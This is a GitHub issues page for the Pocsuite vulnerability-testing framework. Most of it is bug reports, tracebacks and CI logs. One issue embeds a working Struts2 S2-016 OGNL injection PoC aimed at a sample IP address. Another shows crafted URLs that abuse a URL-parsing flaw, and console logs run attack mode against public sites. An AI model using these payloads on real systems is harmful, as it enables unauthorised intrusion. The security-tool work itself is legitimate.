knownsec / pocsuite Goto Github PK
View Code? Open in Web Editor NEWThis project has stopped to maintenance, please to https://github.com/knownsec/pocsuite3 project.
Home Page: http://pocsuite.org
This project has stopped to maintenance, please to https://github.com/knownsec/pocsuite3 project.
Home Page: http://pocsuite.org
Pocsuite> help
Core Commands Menu (help <command> for details)
===============================================
attack Attack mode, sends exploit payload
back Move back from the current Interpreter
banner Display an awesome framework banner
debug Enter into python debug mode
exit Exit the current interpre
help Show help menu
pocadd Load available poc(s) from a directory or a file
pocdel Unload specific poc file(s)
poclist Show all available pocs / task pocs
seebug Download pocs from seebug with API Token
set Set key equal to value
show Show available options / modules
verify Verify Mode, checks if a vuln exists or not
Pocsuite> pocadd /tmp/dp.py
Pocsuite> poclist
IMPORTED-ID POC-PATH
=========== ========
1 /tmp/dp.py
POC--STATUS POC-PATH
=========== ========
ok dp.py
Pocsuite> set url http://192.168.1.100
Pocsuite> attack
[01:14:58] [*] setting the HTTP timeout
[01:14:58] [*] checking dp
[01:14:58] [*] poc:'dp' target:'http://192.168.1.100'
http://192.168.1.100/index.php/system/temporary/?file=config.tar.gz
[01:15:03] [-] 'TestPOC' object has no attribute 'result'
[01:15:03] [-] poc-12345 'Joomla com_jotloader - Full Path Disclosure Vulnerability' failed.
+----------------------+----------+--------+-----------+---------+---------------------------------------------------+
| target-url | poc-name | poc-id | component | version | status |
+----------------------+----------+--------+-----------+---------+---------------------------------------------------+
| http://192.168.1.100 | dp | 12345 | Joomla | 2.2.1 | Error: 'TestPOC' object has no attribute 'result' |
+----------------------+----------+--------+-----------+---------+---------------------------------------------------+
success : 0 / 1
`pocsuite --url https://www.mysite.com/ --vul-keyword 'magento' --verify --report ./report.html
,--. ,--.
,---. ,---. ,---.,---.,--.,----,-' '-.,---. {2.0.6-nongit-20170922} | .-. | .-. | .--( .-'| || ,--'-. .-| .-. : | '-' ' '-' \
--.-' ' '' | | | | \ --. | |-'
---' ---
----' ----'
--' --'
----'
`--' http://pocsuite.org
[!] legal disclaimer: Usage of pocsuite for attacking targets without prior mutual consent is illegal.
[*] starting at 15:46:36
No JSON object could be decoded
Traceback (most recent call last):
File "/Library/Python/2.7/site-packages/pocsuite/pocsuite_cli.py", line 157, in pcsInit
if not s.newToken():
File "/Library/Python/2.7/site-packages/pocsuite/api/x.py", line 107, in newToken
content = json.loads(req.content)
File "/System/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/json/init.py", line 338, in loads
return _default_decoder.decode(s)
File "/System/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/json/decoder.py", line 366, in decode
obj, end = self.raw_decode(s, idx=_w(s, 0).end())
File "/System/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/json/decoder.py", line 384, in raw_decode
raise ValueError("No JSON object could be decoded")
ValueError: No JSON object could be decoded
`
lib/controller/setpoc.py中,只对py文件做了multipleReplace()处理,而pyc由于文件格式原因并未做处理。
我使用了以下代码调用 cannon API :
#!/usr/bin/python
# coding:utf-8
from pocsuite.api.cannon import Cannon
info = {"pocname": "modules\dlink_command_php_exec_noauth.py", #应该是py文件名
"pocstring": "dlink_command_php_exec_noauth.py",
"mode": "verify"
}
target = "www.baidu.com"
invoker = Cannon(target, info) # 生成用来引用 Pocsuite 的实例
result = invoker.run() # 调用 Pocsuite, result 保存了 Pocsuite 执行的返回结果
print result
遇到的错误如下:
Traceback (most recent call last):
dlink_command_php_exec_noauth.py
File "D:/BitTorrentSync/Python_Code/scoutproject/scout/callpocsuite.py", line 9, in <module>
invoker = Cannon(target, info) # 生成用来引用 Pocsuite 的实例
<code object <module> at 025185C0, file "dlink_command_php_exec_noauth.py", line 1>
File "C:\Python27\lib\site-packages\pocsuite-2.0.4.1-py2.7.egg\pocsuite\api\cannon.py", line 45, in __init__
self.registerPoc()
File "C:\Python27\lib\site-packages\pocsuite-2.0.4.1-py2.7.egg\pocsuite\api\cannon.py", line 62, in registerPoc
importer.load_module(self.moduleName)
File "C:\Python27\lib\site-packages\pocsuite-2.0.4.1-py2.7.egg\pocsuite\lib\core\common.py", line 60, in load_module
exec code in mod.__dict__ #exec语句将字符串str当成有效Python代码来执行 ,in后边的内容是指定该语句的全局和局部命名空间。
File "dlink_command_php_exec_noauth.py", line 1, in <module>
NameError: name 'dlink_command_php_exec_noauth' is not defined
建议在Search的字符串这里加一个URL encode
use the python pcs-console.py enter the command line, when input verify, i faced this error:
raceback (most recent call last):
File "pcs-console.py", line 15, in
sys.exit(main())
File "/home/niu/Pocsuite/pocsuite/pocsuite_console.py", line 25, in main
pcs.shell_will_go()
File "/home/niu/Pocsuite/pocsuite/lib/core/consoles.py", line 102, in shell_will_go
self.cmdloop()
File "/usr/lib/python2.7/cmd.py", line 142, in cmdloop
stop = self.onecmd(line)
File "/usr/lib/python2.7/cmd.py", line 221, in onecmd
return func(arg)
File "/home/niu/Pocsuite/pocsuite/lib/core/consoles.py", line 244, in do_verify
self.exploit()
File "/home/niu/Pocsuite/pocsuite/lib/core/consoles.py", line 171, in exploit
setMultipleTarget()
File "/home/niu/Pocsuite/pocsuite/lib/core/option.py", line 219, in setMultipleTarget
if conf.url.endswith('/24'):
AttributeError: 'NoneType' object has no attribute 'endswith'
最近这个版本的问题太多了,zoomeye不稳定,pocsuite 用不了zoomeye seebug接口
错误如下:
No JSON object could be decoded
Traceback (most recent call last):
File "/usr/local/lib/python2.7/dist-packages/pocsuite-2.0.6-py2.7.egg/pocsuite/pocsuite_cli.py", line 83, in pcsInit
if z.newToken():
File "/usr/local/lib/python2.7/dist-packages/pocsuite-2.0.6-py2.7.egg/pocsuite/api/x.py", line 40, in newToken
content = json.loads(req.content)
File "/usr/lib/python2.7/json/init.py", line 339, in loads
return _default_decoder.decode(s)
File "/usr/lib/python2.7/json/decoder.py", line 364, in decode
obj, end = self.raw_decode(s, idx=_w(s, 0).end())
File "/usr/lib/python2.7/json/decoder.py", line 382, in raw_decode
raise ValueError("No JSON object could be decoded")
ValueError: No JSON object could be decoded
-r ***.pyc
If running in a Win OS env, "clear" will make no sense. cls should be a better idea.
按照官方文档加TestPOC(直接用的规范里的测试:https://github.com/knownsec/Pocsuite/blob/ee7c7da71e374d853eb9c8816ba3dbf9261683ed/docs/CODING.md#poc-%E7%BC%96%E5%86%99%E8%A7%84%E8%8C%83%E5%8F%8A%E8%A6%81%E6%B1%82%E8%AF%B4%E6%98%8E)以及test.py;
这两个py在同一目录下;
test.py:
`# -- coding: utf-8 --
import pocsuite
from pocsuite.api.cannon import Cannon
from pocsuite.api.poc import register
import TestPOC
info={"pocname": "TestPOC",
"pocstring": u"sf",
"mode": "verify( or attack)"
}
target="test.site"
invoker=Cannon(target,info)
resulet=invoker.run()`
执行时报错如下:
Traceback (most recent call last): File "/root/xunfeng/aider/test.py", line 8, in <module> import TestPOC File "/root/xunfeng/aider/TestPOC.py", line 91, in <module> register(TestPOC) File "/home/project/sometest/venv/local/lib/python2.7/site-packages/pocsuite/lib/core/register.py", line 22, in registerPoc if module in kb.registeredPocs: File "/home/project/sometest/venv/local/lib/python2.7/site-packages/pocsuite/lib/core/datatype.py", line 46, in __getattr__ raise PocsuiteDataException("unable to access item '%s'" % item) pocsuite.lib.core.exception.PocsuiteDataException: unable to access item 'registeredPocs'
查看源码后,估计是kb中没有registeredPocs;在TestPOC.py中加入
初始 kb["registeredPocs"] = {}
这次就ok了
`TestPOC
[18:11:29] [-] ('Connection aborted.', gaierror(-2, 'Name or service not known'))
('test.site', 'TestPOC', '1571', 'Drupal', '7.x', (3.0, ConnectionError(ProtocolError('Connection aborted.', gaierror(-2, 'Name or service not known')),)), '2017-07-05 18:11:29', '{}')
Process finished with exit code 0`
但这样就是每次只能执行一个,总感觉是不是姿势不对,
求指教
https://travis-ci.org/knownsec/Pocsuite/jobs/160780949
https://gitlab.com/pycqa/flake8/issues/187
Using worker: worker-linux-docker-53caf344.prod.travis-ci.org:travis-linux-16
system_info
Build system information
Build language: python
Build group: stable
Build dist: precise
Build id: 160780948
Job id: 160780949
travis-build version: ef82e8245
Build image provisioning date and time
Thu Feb 5 15:09:33 UTC 2015
Operating System Details
Distributor ID: Ubuntu
Description: Ubuntu 12.04.5 LTS
Release: 12.04
Codename: precise
Linux Version
3.13.0-29-generic
Cookbooks Version
a68419e https://github.com/travis-ci/travis-cookbooks/tree/a68419e
GCC version
gcc (Ubuntu/Linaro 4.6.3-1ubuntu5) 4.6.3
Copyright (C) 2011 Free Software Foundation, Inc.
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
LLVM version
clang version 3.4 (tags/RELEASE_34/final)
Target: x86_64-unknown-linux-gnu
Thread model: posix
Pre-installed Ruby versions
ruby-1.9.3-p551
Pre-installed Node.js versions
v0.10.36
Pre-installed Go versions
1.4.1
Redis version
redis-server 2.8.19
riak version
2.0.2
MongoDB version
MongoDB 2.4.12
CouchDB version
couchdb 1.6.1
Neo4j version
1.9.4
RabbitMQ Version
3.4.3
ElasticSearch version
1.4.0
Installed Sphinx versions
2.0.10
2.1.9
2.2.6
Default Sphinx version
2.2.6
Installed Firefox version
firefox 31.0esr
PhantomJS version
1.9.8
ant -version
Apache Ant(TM) version 1.8.2 compiled on December 3 2011
mvn -version
Apache Maven 3.2.5 (12a6b3acb947671f09b81f49094c53f426d8cea1; 2014-12-14T17:29:23+00:00)
Maven home: /usr/local/maven
Java version: 1.7.0_76, vendor: Oracle Corporation
Java home: /usr/lib/jvm/java-7-oracle/jre
Default locale: en_US, platform encoding: ANSI_X3.4-1968
OS name: "linux", version: "3.13.0-29-generic", arch: "amd64", family: "unix"
fix.CVE-2015-7547
$ export DEBIAN_FRONTEND=noninteractive
W: Size of file /var/lib/apt/lists/us.archive.ubuntu.com_ubuntu_dists_precise-backports_multiverse_source_Sources.gz is not what the server reported 5886 5888
W: Size of file /var/lib/apt/lists/ppa.launchpad.net_ubuntugis_ppa_ubuntu_dists_precise_main_binary-amd64_Packages.gz is not what the server reported 33653 36677
W: Size of file /var/lib/apt/lists/ppa.launchpad.net_ubuntugis_ppa_ubuntu_dists_precise_main_binary-i386_Packages.gz is not what the server reported 33699 36733
Reading package lists...
Building dependency tree...
Reading state information...
The following extra packages will be installed:
libc-bin libc-dev-bin libc6-dev
Suggested packages:
glibc-doc
The following packages will be upgraded:
libc-bin libc-dev-bin libc6 libc6-dev
4 upgraded, 0 newly installed, 0 to remove and 245 not upgraded.
Need to get 8,840 kB of archives.
After this operation, 14.3 kB disk space will be freed.
Get:1 http://us.archive.ubuntu.com/ubuntu/ precise-updates/main libc6-dev amd64 2.15-0ubuntu10.15 [2,943 kB]
Get:2 http://us.archive.ubuntu.com/ubuntu/ precise-updates/main libc-dev-bin amd64 2.15-0ubuntu10.15 [84.7 kB]
Get:3 http://us.archive.ubuntu.com/ubuntu/ precise-updates/main libc-bin amd64 2.15-0ubuntu10.15 [1,177 kB]
Get:4 http://us.archive.ubuntu.com/ubuntu/ precise-updates/main libc6 amd64 2.15-0ubuntu10.15 [4,636 kB]
Fetched 8,840 kB in 0s (25.6 MB/s)
Preconfiguring packages ...
(Reading database ... 72431 files and directories currently installed.)
Preparing to replace libc6-dev 2.15-0ubuntu10.10 (using .../libc6-dev_2.15-0ubuntu10.15_amd64.deb) ...
Unpacking replacement libc6-dev ...
Preparing to replace libc-dev-bin 2.15-0ubuntu10.10 (using .../libc-dev-bin_2.15-0ubuntu10.15_amd64.deb) ...
Unpacking replacement libc-dev-bin ...
Preparing to replace libc-bin 2.15-0ubuntu10.10 (using .../libc-bin_2.15-0ubuntu10.15_amd64.deb) ...
Unpacking replacement libc-bin ...
Processing triggers for man-db ...
Setting up libc-bin (2.15-0ubuntu10.15) ...
(Reading database ... 72430 files and directories currently installed.)
Preparing to replace libc6 2.15-0ubuntu10.10 (using .../libc6_2.15-0ubuntu10.15_amd64.deb) ...
Unpacking replacement libc6 ...
Setting up libc6 (2.15-0ubuntu10.15) ...
Setting up libc-dev-bin (2.15-0ubuntu10.15) ...
Setting up libc6-dev (2.15-0ubuntu10.15) ...
Processing triggers for libc-bin ...
ldconfig deferred processing now taking place
git.checkout
0.66s$ git clone --depth=50 https://github.com/knownsec/Pocsuite.git knownsec/Pocsuite
Cloning into 'knownsec/Pocsuite'...
remote: Counting objects: 1226, done.
remote: Compressing objects: 100% (524/524), done.
remote: Total 1226 (delta 778), reused 1081 (delta 692), pack-reused 0
Receiving objects: 100% (1226/1226), 1.67 MiB | 0 bytes/s, done.
Resolving deltas: 100% (778/778), done.
Checking connectivity... done.
$ cd knownsec/Pocsuite
0.37s$ git fetch origin +refs/pull/113/merge:
remote: Counting objects: 10, done.
remote: Compressing objects: 100% (2/2), done.
remote: Total 10 (delta 8), reused 9 (delta 8), pack-reused 0
Unpacking objects: 100% (10/10), done.
From https://github.com/knownsec/Pocsuite
* branch refs/pull/113/merge -> FETCH_HEAD
$ git checkout -qf FETCH_HEAD
This job is running on container-based infrastructure, which does not allow use of 'sudo', setuid and setguid executables.
If you require sudo, add 'sudo: required' to your .travis.yml
See https://docs.travis-ci.com/user/workers/container-based-infrastructure/ for details.
0.01s$ source ~/virtualenv/python2.6/bin/activate
$ python --version
Python 2.6.9
$ pip --version
pip 6.0.7 from /home/travis/virtualenv/python2.6.9/lib/python2.6/site-packages (python 2.6)
install.1
2.51s$ pip install flake8
Collecting flake8
Downloading flake8-3.0.4-py2.py3-none-any.whl (64kB)
100% |################################| 65kB 2.3MB/s
Collecting pyflakes!=1.2.0,!=1.2.1,!=1.2.2,<1.3.0,>=0.8.1 (from flake8)
Downloading pyflakes-1.2.3-py2.py3-none-any.whl (209kB)
100% |################################| 212kB 2.0MB/s
Collecting mccabe<0.6.0,>=0.5.0 (from flake8)
Downloading mccabe-0.5.2-py2.py3-none-any.whl
Collecting enum34 (from flake8)
Downloading enum34-1.1.6-py2-none-any.whl
Collecting pycodestyle<2.1.0,>=2.0.0 (from flake8)
Downloading pycodestyle-2.0.0-py2.py3-none-any.whl (42kB)
100% |################################| 45kB 5.2MB/s
Collecting configparser (from flake8)
Downloading configparser-3.5.0.tar.gz
/tmp/pip-build-wUzH1r/configparser/setup.py:12: DeprecationWarning: Parameters to load are deprecated. Call .resolve and .require separately.
import sys
Collecting ordereddict (from configparser->flake8)
Downloading ordereddict-1.1.tar.gz
/tmp/pip-build-wUzH1r/ordereddict/setup.py:12: DeprecationWarning: Parameters to load are deprecated. Call .resolve and .require separately.
Installing collected packages: ordereddict, configparser, pycodestyle, enum34, mccabe, pyflakes, flake8
Running setup.py install for ordereddict
/home/travis/virtualenv/python2.6.9/lib/python2.6/site-packages/setuptools/command/egg_info.py:171: DeprecationWarning: Parameters to load are deprecated. Call .resolve and .require separately.
writer = ep.load(installer=installer)
Running setup.py install for configparser
/home/travis/virtualenv/python2.6.9/lib/python2.6/site-packages/setuptools/command/egg_info.py:171: DeprecationWarning: Parameters to load are deprecated. Call .resolve and .require separately.
writer = ep.load(installer=installer)
Skipping installation of /home/travis/virtualenv/python2.6.9/lib/python2.6/site-packages/backports/__init__.py (namespace package)
Installing /home/travis/virtualenv/python2.6.9/lib/python2.6/site-packages/configparser-3.5.0-py2.6-nspkg.pth
Successfully installed configparser-3.5.0 enum34-1.1.6 flake8-3.0.4 mccabe-0.5.2 ordereddict-1.1 pycodestyle-2.0.0 pyflakes-1.2.3
install.2
0.65s$ pip install pydocstyle
Collecting pydocstyle
Downloading pydocstyle-1.0.0-py2.py3-none-any.whl
Installing collected packages: pydocstyle
Successfully installed pydocstyle-1.0.0
0.10s$ python -c "from pocsuite.api.cannon import Cannon; import pocsuite"
The command "python -c "from pocsuite.api.cannon import Cannon; import pocsuite"" exited with 0.
0.33s$ python pocsuite.py --help
usage: pocsuite [options]
optional arguments:
-h, --help Show help message and exit
--version Show program's version number and exit
target:
-u URL, --url URL Target URL (e.g. "http://www.targetsite.com/")
-f URLFILE, --file URLFILE
Scan multiple targets given in a textual file
-r POCFILE Load POC from a file (e.g. "_0001_cms_sql_inj.py") or directory (e.g. "modules/")
mode:
--verify Run poc with verify mode
--attack Run poc with attack mode
request:
--cookie COOKIE HTTP Cookie header value
--referer REFERER HTTP Referer header value
--user-agent AGENT HTTP User-Agent header value
--random-agent Use randomly selected HTTP User-Agent header value
--proxy PROXY Use a proxy to connect to the target URL
--proxy-cred PROXYCRED
Proxy authentication credentials (name:password)
--timeout TIMEOUT Seconds to wait before timeout connection (default 30)
--retry RETRY Time out retrials times.
--delay DELAY Delay between two request of one thread
--headers HEADERS Extra headers (e.g. "key1: value1\nkey2: value2")
--host HOST Host in HTTP headers.
params:
--extra-params EXTRA_PARAMS
Extra params (e.g. "{username: '***', password: '***'}")
optimization:
--threads THREADS Max number of concurrent HTTP(s) requests (default 1)
--report REPORT Save a html report to file (e.g. "./report.html")
--batch BATCH Automatically choose defaut choice without asking.
--requires Check install_requires
--quiet Activate quiet mode, working without logger.
--requires-freeze Check install_requires after register.
Zoomeye or Seebug:
--dork DORK Zoomeye dork used for search.
--max-page MAX_PAGE Max page used in ZoomEye API(10 targets/Page).
--search-type SEARCH_TYPE
search type used in ZoomEye API, web or host
--vul-keyword VULKEYWORD
Seebug keyword used for search.
The command "python pocsuite.py --help" exited with 0.
0.32s$ flake8 . --max-line-length=120 --exclude pocsuite/thirdparty --ignore F401,N802,N803,N806,E501,N813,N801,N812
/home/travis/virtualenv/python2.6.9/lib/python2.6/site-packages/flake8/options/config.py:56: DeprecationWarning: You passed a bytestring as `filenames`. This will not work on Python 3. Use `cp.read_file()` or switch to using Unicode strings across the board.
found_files = config.read(files)
Traceback (most recent call last):
File "/home/travis/virtualenv/python2.6.9/bin/flake8", line 11, in <module>
sys.exit(main())
File "/home/travis/virtualenv/python2.6.9/lib/python2.6/site-packages/flake8/main/cli.py", line 16, in main
app.run(argv)
File "/home/travis/virtualenv/python2.6.9/lib/python2.6/site-packages/flake8/main/application.py", line 316, in run
self._run(argv)
File "/home/travis/virtualenv/python2.6.9/lib/python2.6/site-packages/flake8/main/application.py", line 300, in _run
self.run_checks()
File "/home/travis/virtualenv/python2.6.9/lib/python2.6/site-packages/flake8/main/application.py", line 237, in run_checks
self.file_checker_manager.start(files)
File "/home/travis/virtualenv/python2.6.9/lib/python2.6/site-packages/flake8/checker.py", line 364, in start
self.make_checkers(paths)
File "/home/travis/virtualenv/python2.6.9/lib/python2.6/site-packages/flake8/checker.py", line 272, in make_checkers
checks = self.checks.to_dictionary()
File "/home/travis/virtualenv/python2.6.9/lib/python2.6/site-packages/flake8/plugins/manager.py", line 450, in to_dictionary
plugin.to_dictionary() for plugin in self.ast_plugins
File "/home/travis/virtualenv/python2.6.9/lib/python2.6/site-packages/flake8/plugins/manager.py", line 488, in ast_plugins
plugins = list(self.checks_expecting('tree'))
File "/home/travis/virtualenv/python2.6.9/lib/python2.6/site-packages/flake8/plugins/manager.py", line 443, in checks_expecting
if argument_name == plugin.parameter_names[0]:
File "/home/travis/virtualenv/python2.6.9/lib/python2.6/site-packages/flake8/plugins/manager.py", line 95, in parameter_names
self._parameter_names = list(self.parameters)
File "/home/travis/virtualenv/python2.6.9/lib/python2.6/site-packages/flake8/plugins/manager.py", line 88, in parameters
self._parameters = utils.parameters_for(self)
File "/home/travis/virtualenv/python2.6.9/lib/python2.6/site-packages/flake8/utils.py", line 297, in parameters_for
parameters = collections.OrderedDict([
AttributeError: 'module' object has no attribute 'OrderedDict'
The command "flake8 . --max-line-length=120 --exclude pocsuite/thirdparty --ignore F401,N802,N803,N806,E501,N813,N801,N812" exited with 1.
Done. Your build exited with 1.
第一个是有关“--random-agent”的。在使用这个参数后,生成的User-Agent的形式便会如下: ['Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.211.0 Safari/532.0'],即多了一组中括号和引号;
第二个是有关“-u”参数的。对于经由“-u”传入的地址,如开头不是“http://”或“https://”,便会在开头添加“http://”,而没有考虑到例如“ftp://”等协议,在使用上造成了一些不便。
If a pocsuite newbie,
$ ./pcs-console.py -h
Traceback (most recent call last):
File "./pcs-console.py", line 15, in <module>
sys.exit(main())
File "/Users/Open-Security/Code/ks-pocsuite/pocsuite/pocsuite_console.py", line 27, in main
initializePoc(folders)
File "/Users/Open-Security/Code/ks-pocsuite/pocsuite/lib/core/consoles.py", line 53, in initializePoc
files = os.listdir(folder)
OSError: [Errno 2] No such file or directory: '-h'
uname -a
result heredef set_pwd(self, pwd):
self._password = pwd
缺少一行,用以更新 check 请求时传递的参数数据:
def set_pwd(self, pwd):
self._password = pwd
self._check_data[self._password] = self._check_statement # 缺少该行
If possible, webshells should be in a directory, ex:
If you want to generate webshell flags, please redirect to How to random a string or a number
Please fix links in English README - Usage Part, ex:
Those links are invalid.
We clone code from respository, and run pocsuite console. Some error message as follow:
┌─[lab@core]─[/opt/Pocsuite/pocsuite]
└──╼ python pcs-console.py
Traceback (most recent call last):
File "pcs-console.py", line 28, in <module>
initializePoc(folders)
File "/opt/Pocsuite/pocsuite/lib/core/consoles.py", line 50, in initializePoc
files = os.listdir(folder)
OSError: [Errno 2] No such file or directory: '/opt/Pocsuite/pocsuite/modules
Please create modules directory , or solve the issue in another way.
Try to add a powerful and interactive console,
$ ./pcs-console.py ./modules
,--. ,--.
,---. ,---. ,---.,---.,--.,--`--,-' '-.,---. {2.0.4.1-782b2aa}
| .-. | .-. | .--( .-'| || ,--'-. .-| .-. :
| '-' ' '-' \ `--.-' `' '' | | | | \ --.
| |-' `---' `---`----' `----'`--' `--' `----'
`--' http://pocsuite.org
Pocsuite> help
Core Commands Menu (help <command> for details)
===============================================
attack conduncting attack
back Move back from the current context
banner Display an awesome framework banner
help Show help menu
load load specific poc file(s).
set Set key equal to value
show Show available options / modules
verify conducting verification
Pocsuite> show pocs
{1: './modules/apache_struts_s2_033.py',
2: './modules/dlink_command_php_exec_noauth.py'}
Pocsuite> load 2
[*] load poc file(s) success!
Pocsuite> set url http://www.baidu.com/
Pocsuite> attack
[07:18:53] [*] setting the HTTP timeout
[07:18:53] [*] checking dlink_command_php_exec_noauth
[07:18:53] [!] missing ['appPowerLink'] in dlink_command_php_exec_noauth
[07:18:53] [*] poc:'dlink_command_php_exec_noauth' target:'http://www.baidu.com/'
[07:18:54] [-] poc-78176 'Multiple Vulnerabilities in D-Link DIR-600 and DIR-300' failed.
+-----------------------+-------------------------------+--------+-----------+------------------+----------+
| target-url | poc-name | poc-id | component | version | status |
+-----------------------+-------------------------------+--------+-----------+------------------+----------+
| http://www.baidu.com/ | dlink_command_php_exec_noauth | 78176 | D-Link | DIR-300, DIR-600 | Error: n |
+-----------------------+-------------------------------+--------+-----------+------------------+----------+
success : 0 / 1
Hi.
Thank you for making a good tool.
I ZoomEye API error occurs.
What is the solution?
Check the following logs.
root@kali-Odin:~# pocsuite --dork 'port:6379' --max-page 3 --vul-keyword redis --verify
[!] legal disclaimer: Usage of pocsuite for attacking targets without prior mutual consent is illegal.
[*] starting at 05:55:29
[05:55:34] [+] ZoomEye API authorization failed,Please input ZoomEye Email and Password for use ZoomEye API!
ZoomEye Email:[email protected]
ZoomEye Password:password123
Thanks.
例如 PoC 正常运行需要提供额外的数据,如应用密钥(authkey)等等,因为在渗透或者扫描中,每个站点的密钥值不相同,需要外部传入才能保证 PoC 的整体处理流程正确性。
uname -a
result here粗略的看了一下文档有一些疑问,请问这个框架是只支持http的poc编写么?如果我想编写非http的poc是否需要自己重新编写一个poc类?
考虑到降低 Attack 方法的误报率,在 Attack 前先调用 Verify,验证存在漏洞后再进行 Attack 逻辑。
现在问题来了,要不要框架自动调用 Verify?
Once is enough.
from pocsuite.lib.utils import versioncheck
from pocsuite.lib.utils import versioncheck
from pocsuite.lib.utils import versioncheck
from pocsuite.lib.utils import versioncheck
from .lib.utils import versioncheck
你好,我测试了好久,看官方文档也是说req就是跟requests模块一样,但是我测试poc时,get可以,req.get,但是req.post就不行,希望能够指导下,下面奉上完整的poc:
`#!/usr/bin/env python
import re
import urlparse
from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register
class TestPOC(POCBase):
vulID = '' # ssvid
version = '1'
author = ['']
vulDate = ''
createDate = ''
updateDate = ''
references = ['']
name = '5clib_str2-016'
appPowerLink = 'http://www.wooyun.org/bugs/wooyun-2010-0128686'
appName = '5clib'
appVersion = ''
vulType = 'str2-016'
desc = '''
5clib_str2-016
'''
samples = ['http://58.119.33.50:8081/']
def _attack(self):
return self._verify()
def _verify(self):
result = {}
vulurl = urlparse.urljoin(self.url, '/5clib/property.action')
payload = "?redirect:${%23req%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletReq%27%2b%27uest%27),%23resp%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletRes%27%2b%27ponse%27),%23resp.setCharacterEncoding(%27UTF-8%27),%23resp.getWriter().print(%22web%22),%23resp.getWriter().print(%22path88888887:%22),%23resp.getWriter().print(%23req.getSession().getServletContext().getRealPath(%22/%22)),%23resp.getWriter().flush(),%23resp.getWriter().close()}"
resp = req.get(vulurl + payload)
if resp.status_code == 200 and '88888887' in resp.content:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = vulurl
result['VerifyInfo']['Payload'] = payload
return self.parse_attack(result)
def parse_attack(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('Internet nothing returned')
return output
register(TestPOC)
`
https://github.com/knownsec/Pocsuite/blob/master/docs/INTEGRATE.md#poc-成功失败异常信息
手册中调用cannon api返回的poc字段不够详细,没有返回poc的 desc、vulType、references字段。
[11:15:19] [-] unable to access item 'retry'
[- 09/18/16 11:15:19,018][cannon.py:71] >> unable to access item 'retry'
我在验证solr未授权访问漏洞时,使用网页版搜索solr country:cn
得到结果正常,有160+
使用--dork "solr"
正常
使用--dork "country:cn"
正常
使用--dork "solr country:cn"
无结果
查了下官方的API说明,并未发现这种功能。是我的姿势不对吗?
还有我看了下API的源码,返回只有IP,但是在实际PoC时端口也是非常重要的,是否考虑增加几行代码实现返回IP+端口
def search(self, dork, page=1, resource='web'):
req = requests.get(
'https://api.zoomeye.org/{}/search?query="{}"&page={}&facet=app,os'.format(resource, urllib.quote(dork),
page + 1),
headers=self.headers
)
content = json.loads(req.content)
if 'matches' in content:
anslist = []
for match in content['matches']:
ans = match['ip']
if match.has_key('portinfo'):
ans += ':' + str(match['portinfo']['port'])
anslist.append(ans)
return anslist
else:
return []
类似比如这种JS跳转,get无法跟踪,可以patch requests
>>> url = r'http://m.baidu.com/from=1012585f/bd_page_type=1/ssid=15567761646568656174327407/uid=0/pu=usm%402%2Csz%401320_2001%2Cta%40iphone_1_3.0_3_528/baiduid=F8CF1C9B13A69F341A9A38C3718410D8/w=10_10_%E9%B1%BC%E8%82%9D%E6%B2%B9%E7%9A%84%E5%8A%9F%E6%95%88%E4%B8%8E%E4%BD%9C%E7%94%A8/t=iphone/l=1/tc?ref=www_iphone&lid=16538771669423618855&order=4&waplogo=1&fm=wnor&dict=-1&tj=www_zhidao_normal_4_10_10_title&sec=8644&di=312580a852c21860&bdenc=1&nsrc=IlPT2AEptyoA_yixCFOxXnANedT62v3IDBqMMS6LLDivpEmixP4kHREsRC0aNWiCGkb8gTCcshYFuX3b_71l8hRArKtosWka6SWhuKC'
>>> import requests
>>> res = requests.head(url)
>>> res.headers['Location']
'http://zhidao.baidu.com/question/390970477767010205.html'
uname -a
result herekali 安装pocsuite 使用pcs-console.py 提示如下:
`Pcs.poc> avaliable
+-------+----------------------------+---------+
| pocId | avaliablePocName | Folder |
+-------+----------------------------+---------+
| 1 | dede_download.php_sqli.php | modules |
| 2 | SSV-62274 | modules |
| 3 | dede_guestbook_sqli | modules |
| 4 | dede_search.php_sqli | modules |
| 5 | dede_recommend.php_sqli | modules |
+-------+----------------------------+---------+
Pcs.poc> load 1
unable to access item 'isPocString'
`
程序版本为最新版 1.2.6
求解答原因~
需要个英文版的帮助文档
如标题
对于经由“-u”传入的地址,如开头不是“http://”或“https://”或没指定协议,便会在地址开头添加“http://”,在使用ssh,ftp等协议时造成了一些不便(需要在poc内重新处理地址)。
修复建议的话是检测poc中是否import了urllib,requests等包。若没引入,则默认程序编写者已意识到地址处理的问题且不处理地址。
rt
def url2ip(url):
"""
works like turning 'http://baidu.com' => '180.149.132.47'
"""
iport = urlsplit(url)[1].split(':')
if len(iport) > 1:
return gethostbyname(iport[0]), iport[1]
return gethostbyname(iport[0])
http://localhost:[email protected]/
这个文件的url2ip函数在为url解析ip地址的时候可能因为:号分割处理不当解析到其他IP造成ssrf。
标准的URL格式:
协议://用户名:密码@子域名.域名.顶级域名:端口号/目录/文件名.文件后缀?参数=值#标志
如果传递如下url给该函数:
"http://localhost:[email protected]/"
最后将返回:
('127.0.0.1', '[email protected]')
任意IP地址解析:
http://0x08080808:www.baidu.com/
http://0x08080808:[email protected]/
返回:
('8.8.8.8', 'www.baidu.com')
('8.8.8.8', '[email protected]')
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register
from pocsuite.api.utils import url2ip
class TestPOC(POCBase):
name = "url2iptest"
vulID = 'test'
author = ['']
vulType = 'test'
version = '1.0'
references = ''
desc = ''
vulDate = ''
createDate = ''
updateDate = ''
appName = ''
appVersion = ''
appPowerLink = ''
samples = []
def _attack(self):
return self._verify()
def _verify(self):
address=url2ip(self.url)
result={}
result['ipinfo']={}
result['ipinfo']['address']=address
return self.parse_output(result)
def parse_output(self,result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('Internet nothing returned')
return output
